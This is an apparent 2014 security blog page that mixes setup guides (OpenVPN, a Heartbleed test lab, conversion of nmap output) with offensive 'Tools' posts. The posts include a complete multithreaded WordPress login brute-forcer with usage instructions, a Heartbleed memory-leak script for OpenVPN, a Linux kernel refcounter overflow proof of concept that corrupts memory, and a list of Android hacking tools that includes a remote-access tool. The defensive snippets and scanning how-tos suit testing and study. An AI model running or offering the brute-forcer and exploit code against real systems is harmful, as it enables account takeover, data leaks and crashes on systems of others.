CVE Feeds

Apr 23, 2014

Howto: Set up an OpenVPN server on Ubuntu 12.04

1. Install openvpn and openssl
apt-get update
apt-get install openvpn openssl vim

2. Copy default config from /usr/share/doc/openvpn/examples/easy-rsa/2.0/ to /etc/openvpn/easy-rsa
cd /etc/openvpn
cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0 ./easy-rsa

3. Edit /etc/openvpn/easy-rsa/vars
Change from
export EASY_RSA="`pwd`"
to

export EASY_RSA="/etc/openvpn/easy-rsa"

4. Go to /etc/openvpn/easy-rsa and source the vars file
cd /etc/openvpn/easy-rsa
. ./vars

5. Clear keys
./clean-all

6. Create config openssl.cnf from openssl-1.0.0.cnf
cp openssl-1.0.0.cnf openssl.cnf

7. Build the CA, the server and client certificates, and the DH parameters
./build-ca OpenVPN
./build-key-server server
./build-key client1
./build-dh

8. Create openvpn.conf in /etc/openvpn/ with this content.
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.10.10.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo


9. Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward

10. Create an iptables NAT rule for the forwarded packets (eth0 is my interface name, change it to your own network interface; 10.211.55.25 is the IP address of my eth0 interface)
iptables -t nat -A POSTROUTING -s 10.10.10.0/24 -o eth0 -j SNAT --to 10.211.55.25

11. Start the OpenVPN server
/etc/init.d/openvpn start

12. Create the client configuration file (client.conf) with this content, and copy the client1 certificate and key files created in step 7 next to it.

dev tun
client
proto udp
remote 10.211.55.25 1194
resolv-retry infinite
nobind
persist-key
persist-tun
ca ca.crt
cert client1.crt
key client1.key
comp-lzo
verb 3

13. Run openvpn client
openvpn client.conf
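As an added check that is not part of the original post, this Python 3 snippet parses the server configuration from step 8 (embedded inline) and reports the settings a reviewer would look at before exposing the server: DH size, privilege dropping, client-to-client reachability, pushed DNS, and whether the control channel is protected by tls-auth/tls-crypt (it is not in this configuration). The finding names are my own.

```python
import re
# The server configuration from step 8, embedded here so the review runs offline.
SERVER_CONF = """\
dev tun
proto udp
port 1194
ca /etc/openvpn/easy-rsa/keys/ca.crt
cert /etc/openvpn/easy-rsa/keys/server.crt
key /etc/openvpn/easy-rsa/keys/server.key
dh /etc/openvpn/easy-rsa/keys/dh1024.pem
user nobody
group nogroup
server 10.10.10.0 255.255.255.0
persist-key
persist-tun
status /var/log/openvpn-status.log
verb 3
client-to-client
push "redirect-gateway def1"
#set the dns servers
push "dhcp-option DNS 8.8.8.8"
push "dhcp-option DNS 8.8.4.4"
log-append /var/log/openvpn
comp-lzo
"""

def parse_openvpn_conf(text):
    """Return (directive, [args]) pairs; blanks and #/; comments skipped, quoted args kept whole."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        parts = re.findall(r'"[^"]*"|\S+', line)
        entries.append((parts[0], [p.strip('"') for p in parts[1:]]))
    return entries

def review_server_conf(text):
    """Summarise the settings a reviewer looks at before exposing the server."""
    entries = parse_openvpn_conf(text)
    names = {d for d, _ in entries}
    dh_file = next((a[0] for d, a in entries if d == "dh" and a), "")
    m = re.search(r"dh(\d+)\.pem$", dh_file)
    bits = int(m.group(1)) if m else None
    return {
        "dh_bits": bits,
        "dh_weak": bits is not None and bits < 2048,          # 1024-bit DH is below current guidance
        "drops_privileges": {"user", "group"} <= names,       # daemon runs as nobody/nogroup after start
        "client_to_client": "client-to-client" in names,      # clients can reach each other directly
        "tls_auth": bool(names & {"tls-auth", "tls-crypt"}),  # HMAC on the control channel, absent here
        "pushed_dns": [a[0].split()[-1] for d, a in entries
                       if d == "push" and a and a[0].startswith("dhcp-option DNS")],
    }
```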
 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Create a lab for testing Heartbleed

First, this tutorial requires Ubuntu 12.04.

1. Install apache2, openssl
$ apt-get install apache2 openssl

2. Enable https website
$ a2enmod ssl
$ a2ensite default-ssl

3. Download the test script from http://www.aldeid.com/wiki/CVE-2014-016-Heartbleed-Vulnerability

4. Run the test script against your website or OpenVPN server.


Howto: Check LibSSL for Heartbleed

Upgrading Ubuntu 12.04 by installing the openssl package does not guarantee that the Heartbleed vulnerability is fixed: you must install the updated libssl1.0.0 package too. If you want to check the OpenSSL version of the libssl library itself, use this command.

strings /lib/x86_64-linux-gnu/libssl.so.1.0.0 | grep OpenSSL
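Added example, not from the original post: a Python 3 helper that pulls the version out of the strings output above, classifies it against the upstream Heartbleed-affected range, and, because Ubuntu keeps the "1.0.1" banner after backporting the fix, compares the installed libssl1.0.0 package version against the fixed one from USN-2165-1. The strings output is constructed, and the package comparison is a simplified one that only covers revisions of the same upstream line.

```python
import re

# Constructed sample of `strings libssl.so.1.0.0 | grep OpenSSL` output: only the
# version banner line matters, the other matches are unrelated strings in the library.
SAMPLE_STRINGS_OUTPUT = """\
OpenSSL PKCS#1 RSA
OpenSSL 1.0.1 14 Mar 2012
OpenSSL SSL/TLS
"""

# Ubuntu 12.04 LTS libssl1.0.0 package version that carried the Heartbleed fix (USN-2165-1).
PRECISE_FIXED_PKG = "1.0.1-4ubuntu5.12"

BANNER_RE = re.compile(r"^OpenSSL (\d+\.\d+\.\d+[a-z]?(?:-beta\d+)?)\s+\d{1,2} \w{3} \d{4}")

def find_openssl_version(strings_output):
    """Return the version from the 'OpenSSL x.y.z <date>' banner, or None if absent."""
    for line in strings_output.splitlines():
        m = BANNER_RE.match(line.strip())
        if m:
            return m.group(1)
    return None

def heartbleed_affected_upstream(version):
    """Upstream OpenSSL 1.0.1 through 1.0.1f and 1.0.2-beta1 contain the vulnerable
    heartbeat code; 1.0.1g fixed it and the 1.0.0/0.9.8 branches never had it."""
    m = re.match(r"^(\d+\.\d+\.\d+)([a-z]?)(?:-(beta\d+))?$", version)
    if not m:
        raise ValueError("unrecognised OpenSSL version: %r" % version)
    base, letter, beta = m.groups()
    if base == "1.0.1":
        return letter <= "f"
    if base == "1.0.2":
        return beta == "beta1"
    return False

def _version_tuple(debian_version):
    # Simplified: enough for revisions of one upstream/Debian line, not a full dpkg compare.
    return tuple(int(x) for x in re.findall(r"\d+", debian_version))

def precise_libssl_fixed(installed_pkg_version):
    """Distributions backport fixes without changing the banner, so on Ubuntu 12.04 the
    installed libssl1.0.0 package version decides, not the '1.0.1' string."""
    return _version_tuple(installed_pkg_version) >= _version_tuple(PRECISE_FIXED_PKG)
```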
 


Apr 22, 2014

Howto: Convert nmap xml file to csv file

I got the script from http://blog.didierstevens.com/2014/04/16/nmap-grepable-script-output-heartbleed/ and it works perfectly, so I wrote this post to explain how it works.

1. Scan with nmap, saving the result as XML
$ nmap -p443 -sV --script=ssl-heartbleed target -oX test-heartbleed.xml

2. Download the script from the source (http://didierstevens.com/files/software/nmap-xml-script-output_V0_0_1.zip)

3. Unzip file
$ unzip nmap-xml-script-output_V0_0_1.zip

4. Change permission for executing
chmod +x nmap-xml-script-output.py

5. Run it on the nmap XML output (test-heartbleed.xml), writing a comma-separated CSV file
./nmap-xml-script-output.py -o test-heartbleed.csv -s "," test-heartbleed.xml
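Added example, not Didier Stevens' script: a Python 3 version of the same conversion using only the standard library, run on a constructed nmap XML file for one host. The column names and the collapsing of the script output to VULNERABLE / NOT VULNERABLE are my own choices; the separator argument mirrors the script's -s option.

```python
import csv
import io
import xml.etree.ElementTree as ET

# Constructed nmap -oX output for one host scanned with --script=ssl-heartbleed
# (not a real scan result); only the 443/tcp port carries script output.
SAMPLE_NMAP_XML = """\
<nmaprun scanner="nmap" args="nmap -p443,22 -sV --script=ssl-heartbleed -oX test-heartbleed.xml 192.0.2.10">
<host><status state="up"/>
<address addr="192.0.2.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="443"><state state="open"/>
<service name="http" product="Apache httpd" version="2.2.22" tunnel="ssl"/>
<script id="ssl-heartbleed" output="&#10;  VULNERABLE:&#10;  The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library.&#10;    State: VULNERABLE&#10;    Risk factor: High&#10;"/>
</port>
<port protocol="tcp" portid="22"><state state="open"/>
<service name="ssh" product="OpenSSH" version="5.9p1"/>
</port>
</ports></host>
</nmaprun>
"""

def script_result(output):
    """Collapse the script's multi-line output to the state it reports."""
    if "State: NOT VULNERABLE" in output:
        return "NOT VULNERABLE"
    if "State: VULNERABLE" in output:
        return "VULNERABLE"
    return "UNKNOWN"

def nmap_script_rows(xml_text):
    """One row per (host, port, script) element; ports without script output are skipped."""
    rows = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            svc = port.find("service")
            service = svc.get("name", "") if svc is not None else ""
            for script in port.findall("script"):
                rows.append([addr, port.get("portid"), port.get("protocol"), service,
                             script.get("id"), script_result(script.get("output", ""))])
    return rows

def rows_to_csv(rows, separator=","):
    """Render the rows with a header line; separator plays the role of the script's -s option."""
    buf = io.StringIO()
    writer = csv.writer(buf, delimiter=separator, lineterminator="\n")
    writer.writerow(["ip", "port", "proto", "service", "script", "result"])
    writer.writerows(rows)
    return buf.getvalue()
```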


Tools: Multithreaded WordPress brute-forcing tool in Python

    #!/usr/bin/python
    # Video: http://youtu.be/mURnM-Yp72g
    # Coded By: xSecurity
     
    import urllib, urllib2, os, sys, requests as xsec, re
    from time import sleep
    from threading import Thread
    def cls():
        linux = 'clear'
        windows = 'cls'
        os.system([linux,windows][os.name == 'nt'])
    cls()
    print '''
          __                      _ _        
    __  __/ _\ ___  ___ _   _ _ __(_) |_ _   _
    \ \/ /\ \ / _ \/ __| | | | '__| | __| | | |
    >  < _\ \ __/ (__| |_| | |  | | |_| |_| |
    /_/\_\\__/\___|\___|\__,_ |_|  |_|\__|\__, |
                                        |___/WordPress Brute Muliththreading :)
    #Home: Sec4ever.CoM | Is-Sec.CoM | s3c-k.com
    #Greets: UzunDz - b0x - Lov3rDNS - Mr.Dm4r - DamaneDz - rOx - r0kin
    Special For My Lov3r Cyber-Crystal
    #Usage: Python wp.py http://target.com/ admin pass.txt
    #Note: U Need Install Requests Package: http://www.youtube.com/watch?v=Ng5T18HyA-Q'''
     
    xsec = xsec.session()
    def brute(target,usr,pwd):
        get = xsec.get(target+'/wp-admin/')
        post = {}
        post["log"] = usr
        post["pwd"] = pwd
        post["wp-submit"] = "Log+in"
        post["redirect_to"] = target
        post["testcookie"] = "1"
        get2 = xsec.post(target+'/wp-login.php' , data=urllib.urlencode(post))
        get3 = xsec.get(target+'/wp-admin')
        if '<li id="wp-admin-bar-logout">' in get3.text:
            print '[+] Cracked Username: '+usr+' & Password: '+pwd
            os._exit(1)
        else:
            print '[~] Trying ...: '+pwd
     
    if len(sys.argv) >= 3:
        target = sys.argv[1]
        usr = sys.argv[2]
        lst = open(sys.argv[3]).read().split("\n")
        print '[*]Target: '+target
        print '[*]LIST:',len(lst)
        print '[*]Username: '+usr
        thrdlst = []
        for pwd in lst:
            t = Thread(target=brute, args=(target,usr,pwd))
            t.start()
            thrdlst.append(t)
            sleep(0.009)
        for b in thrdlst:
            b.join()
    else:
        print '[>]There Somthing Missing Check ARGVS :)'

Source: http://pastebin.com/4BV4Kj0a


Tools: Heartbleed Vulnerability in VPN

#!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 on OpenVPN
# by Stefan Agner (stefan@agner.ch)
# based on work of Jared Stafford and Yonathan Klijnsma
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
target = None
# OpenVPN Session ID
lsesseionid = 0x12345678
packetid = 0
options = OptionParser(usage='%prog server [options]', description='Test for TLS heartbeat vulnerability on OpenVPN Server (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=1194, help='Port to test (default: 1194)')
def h2bin(x):
    return x.replace(' ', '').replace('\n', '').decode('hex')
hello_openvpn = h2bin('''
16 03 01 00 df 01 00 00 db 03 01 95 a3 8a 7f 46
a9 1c 78 99 21 ae 92 6d 2d 14 5a 8f 2b c8 ee e2
0b 9e 38 34 ec 3d 66 2b 9c d5 63 00 00 68 c0 14
c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f
c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16
00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e
00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04
00 2f 00 96 00 41 00 07 c0 11 c0 07 c0 0c c0 02
00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08
00 06 00 03 00 ff 02 01 00 00 49 00 0b 00 04 03
00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00
0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00
06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00
01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00
0f 00 01 01
''')
# Get OpenVPN header...
def msg_hdr(hdr):
    if hdr is None:
        return None, None, None
    typ, sessionid, packarrlen = struct.unpack('>bQb', hdr)
    #print "Typ %d, SessionID %d, Packet-ID array length %d" % (typ, sessionid, packarrlen)
    return typ, sessionid, packarrlen
def msg_tls_heartbeat_header(data):
    typ, ver, length = struct.unpack('>bhh', data[0:5])
    return typ, ver, length
def msg_tls_heartbeat_request(payload, hb_length=0x4000):
    return struct.pack('>bhhbh{0}s'.format(len(payload)), 24, 0x0301, len(payload) + 3, 1, hb_length, payload)
 
def check_hb(typ, ver, pay_length):
    if typ == 24:
        if pay_length > 3:
            print target + '|VULNERABLE'
        else:
            print target + '|NOT VULNERABLE'
        return True
    if typ == 21:
        print target + '|NOT VULNERABLE'
        return False
    print target + '|NOT VULNERABLE'
    return False
def msg_id(data):
    packid, = struct.unpack('>i', data)
    return packid
def msg_pack(data):
    # Packet ID...
    return
def hexdump(src, length=8):
    result = []
    digits = 4 if isinstance(src, unicode) else 2
    for i in xrange(0, len(src), length):
       s = src[i:i+length]
       hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
       text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
       result.append( b"%04X %-*s %s" % (i, length*(digits + 1), hexa, text) )
    return b'\n'.join(result)
def send_message(s, data):
    global packetid
    start = 0
    length = 0
    cnt = 0
    bytes_remaining = len(data)
    while bytes_remaining > 0:
        if bytes_remaining > 100:
            length = 100
        else:
            length = bytes_remaining
        s.send(struct.pack('>bQbi{0}s'.format(length), 0x20, lsesseionid, 0, packetid, data[start:start+length]))
        sys.stdout.flush()
        packetid += 1
        cnt += 1
        bytes_remaining -= length
        start += length
    return cnt
def handle_message(s):
    global lsesseionid
    data = s.recv(1024)
    pos = 10
    typ, sessionid, packarrlen = msg_hdr(data[0:pos])
    if packarrlen > 0:
        pos = 10 + packarrlen * 4
        msg_pack(data[10:pos])
        # Remote-SessionID
        pos += 8
    if typ == 0x28:
        #print "Ack received"
        return typ, sessionid, packarrlen, None, None
    # Send ACK..
    packid = msg_id(data[pos:pos+4])
    s.send(struct.pack('>bQbiQ', 0x28, lsesseionid, 1, packid, sessionid))
    if typ == 0x20:
        #print "Control Message received"
        return typ, sessionid, packarrlen, packid, data[pos+4:]
    return typ, sessionid, packarrlen, packid, None
def main():
    global target
    global lsesseionid
    global packetid
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return
    target = args[0]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sys.stdout.flush()
    s.connect((target, opts.port))
    sys.stdout.flush()
    s.send(struct.pack('>bqbi', 0x38, lsesseionid, 0, packetid))
    packetid += 1
    typ, sessionid, packarrlen, packid, payload = handle_message(s)
    send_message(s, hello_openvpn)
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        # Look for server hello done message.
        if typ == 0x20 and len(payload) < 100:
            break
        if typ == None:
            print "Hello message failed"
            return
    hb_length = 0x1000
    hb = msg_tls_heartbeat_request("Heartbleed test payload", hb_length)
    send_message(s, hb)
    hb_received = False
    heartbleed = ""
    other = 0
    # Heartbeat delivered, if vulnerable, we receive data...
    while True:
        typ, sessionid, packarrlen, packid, payload = handle_message(s)
        if typ == 0x20:
            # Control message, should contain heartbeat answer...
            heartbleed += payload
            if not hb_received:
                # Check HB header early...
                hb_received = True
                tlstype, tlsversion, tlslength = msg_tls_heartbeat_header(payload)
                check_hb(tlstype, tlsversion, tlslength)
        elif typ == 0x28:
            # We received ack only, the server ignored our heartbeat
            print target + '|NOT VULNERABLE (only ACK received)'
            return
        if len(heartbleed) >= hb_length + 5:
            break
    print hexdump(heartbleed[0:100], 16)
if __name__ == '__main__':
    main()
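Added example, not part of Stefan Agner's script: the scanner above declares a heartbeat payload length of 0x1000 while sending a 23-byte payload, and that mismatch between the declared length and the record is exactly what the bounds check added in OpenSSL 1.0.1g rejects. This Python 3 snippet rebuilds the same heartbeat record from the page's struct layout (type 24, version 0x0301, record length, heartbeat type 1, declared length, payload) and inspects TLS records for the overrun; the builder, the padding default and the constructed payloads are my own.

```python
import struct

TLS_HEARTBEAT = 24          # TLS content type for heartbeat records (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2

def build_heartbeat_record(payload, declared_len=None, padding=b"\x00" * 16):
    """Build a TLS heartbeat request record (constructed helper for this example).
    declared_len defaults to the true payload length, giving a well-formed request;
    a larger value with padding=b"" reproduces the bytes the scanner above sends."""
    if declared_len is None:
        declared_len = len(payload)
    body = struct.pack(">BH", HB_REQUEST, declared_len) + payload + padding
    return struct.pack(">BHH", TLS_HEARTBEAT, 0x0301, len(body)) + body

def inspect_heartbeat_record(record):
    """Parse one TLS record and apply the bounds check from the OpenSSL 1.0.1g fix:
    type(1) + length(2) + declared payload + 16 bytes padding must fit in the record."""
    if len(record) < 5:
        raise ValueError("truncated TLS record header")
    ctype, version, rec_len = struct.unpack(">BHH", record[:5])
    if ctype != TLS_HEARTBEAT:
        return {"heartbeat": False, "content_type": ctype}
    body = record[5:5 + rec_len]
    if len(body) != rec_len or len(body) < 3:
        return {"heartbeat": True, "malformed": True, "reason": "record body truncated"}
    hb_type, declared_len = struct.unpack(">BH", body[:3])
    actual_len = len(body) - 3
    overrun = 1 + 2 + declared_len + 16 > rec_len   # the check a patched server performs
    return {"heartbeat": True, "malformed": overrun, "hb_type": hb_type,
            "version": version, "declared_len": declared_len, "actual_len": actual_len,
            "reason": "declared payload length overruns the record" if overrun else None}
```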
 
 





Apr 21, 2014

Howto: Test Heartbleed with Nmap or Metasploit in Kali

Nmap
1. Update nmap & nse
$ apt-get install nmap
$ nmap --script-updatedb
(Or download ssl-heartbleed.nse from https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse and tls.lua from http://nmap.org/svn/nselib/tls.lua, then save tls.lua to /usr/share/nmap/nselib/ and ssl-heartbleed.nse to /usr/share/nmap/scripts/.)

2. Scan with nmap using the ssl-heartbleed script.
$ nmap -sV --script=ssl-heartbleed --script-args vulns.showall target
Options summary:
  • -d turns on debugging output, helpful for seeing problems with the script.
  • --script ssl-heartbleed selects the ssl-heartbleed script to run on appropriate ports.
  • --script-args vulns.showall tells the script to output "NOT VULNERABLE" when it does not detect the vulnerability.
  • -sV requests a service version detection scan, which will allow the script to run against unusual ports that support SSL.
  • --script-trace shows a packet dump of all script-related traffic, which may show memory dumps from the Heartbleed bug.
  • -p 443 limits the script to port 443, but use caution! Even services like SMTP, FTP, and IMAP can be vulnerable.
  • -oA heartbleed-%y%m%d saves Nmap's output in 3 formats as heartbleed-20140410.nmap, heartbleed-20140410.xml, and heartbleed-20140410.gnmap.


Metasploit
1. Update your metasploit
$ msfupdate

2. Get your msfconsole
$ msfconsole

3. Load the auxiliary/scanner/ssl/openssl_heartbleed module, set RHOSTS to the target host, and run it.
msf> use auxiliary/scanner/ssl/openssl_heartbleed
msf> set RHOSTS 
msf> run




Apr 20, 2014

Tools: 10 Hacking Tools Of Android

1. Hackode

Hackode: The Hacker's Toolbox is an application for penetration testers, ethical hackers, IT administrators and cyber security professionals to perform different tasks like reconnaissance, scanning, performing exploits etc.

2. androrat

Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the server.

3. APKInspector

APKinspector is a powerful GUI tool for analysts to analyse Android applications. The goal of this project is to aid analysts and reverse engineers in visualising compiled Android packages and their corresponding DEX code.

4. DroidBox

DroidBox is developed to offer dynamic analysis of Android applications.

5. Burp Suite

Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.

6. zANTI

zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.

7. DroidSheep

DroidSheep can be used by anybody who has an Android device, and only the provider of the web service can protect its users. So anybody can test the security of his own account and decide whether to keep on using the web service.

8. dSploit

dSploit is an Android network analysis and penetration suite which aims to offer IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

9. AppUse – Android Pentest Platform Unified Standalone Environment

AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free platform for mobile application security testing in the Android environment, and it includes unique custom-made tools created by AppSec Labs.

10. Shark for Root

Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open the dump use Wireshark or similar software; to preview the dump on the phone use Shark Reader. Based on tcpdump.


Source: http://www.efytimes.com/e1/fullnews.asp?edid=136275



Apr 19, 2014

Tools: Linux group_info refcounter overflow memory corruption (CVE-2014-2851)

This post on LKML got me curious and I decided to trigger the overflow to see what it got me.


#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>      /* atoi(), system() */
#include <sys/socket.h>

int main(int argc, char *argv[]) {
    unsigned i;
    /* Stop a few increments short of 2^32; the processes spawned afterwards
       push the counter over the edge. */
    unsigned count = (1UL << 32) - 8;
    if (argc >= 2) {
        /* Specify count; a negative value such as -20 wraps to 2^32 - 20 */
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n", count);
    for (i = 0; i < count; i++) {
        /* Each ping-socket creation takes a group_info reference that is never released */
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if (i % (1 << 22) == 0)
            printf("%u \n", i);
    }
    /* Now make it wrap and crash: */
    system("/bin/echo bye bye");
    return 0;
}

If the code doesn't work, try different values for count (argv[1]), for example -20. When the exploit finishes, run some nested shells to increment the group_info usage counter: every subprocess will increment the usage counter.

It takes a while because 2^32 syscalls have to be executed, but eventually the refcounter overflows.
When the refcounter is close to overflowing, the code executes another process. When this process finishes, atomic_dec_and_test returns true and the creds are freed while still in use. This results in memory corruption and a crash.

The actual overflow happens in cred.h:

atomic_inc(&gi->usage);
The disassembly of ping_init_sock shows the overflow:
Dump of assembler code for function ping_init_sock:
   0xffffffff8164b960 <+0>:     push   %rbp
   0xffffffff8164b961 <+1>:     mov    %rsp,%rbp
   0xffffffff8164b964 <+4>:     push   %r12
   0xffffffff8164b966 <+6>:     push   %rbx
   0xffffffff8164b967 <+7>:     data32 data32 data32 xchg %ax,%ax
   0xffffffff8164b96c <+12>:    mov    %gs:0xb880,%rax
   0xffffffff8164b975 <+21>:    mov    0x480(%rax),%rax
   0xffffffff8164b97c <+28>:    mov    0x30(%rdi),%rdx
   0xffffffff8164b980 <+32>:    mov    0x18(%rax),%edi
   0xffffffff8164b983 <+35>:    mov    0x88(%rax),%rax
=> 0xffffffff8164b98a <+42>:    incl   %ds:(%rax)
   0xffffffff8164b98d <+45>:    mov    0x4(%rax),%r10d
   0xffffffff8164b991 <+49>:    lea    0x390(%rdx),%r9



Source: http://thomaspollet.blogspot.be/2014/04/linux-groupinfo-refcounter-overflow.html


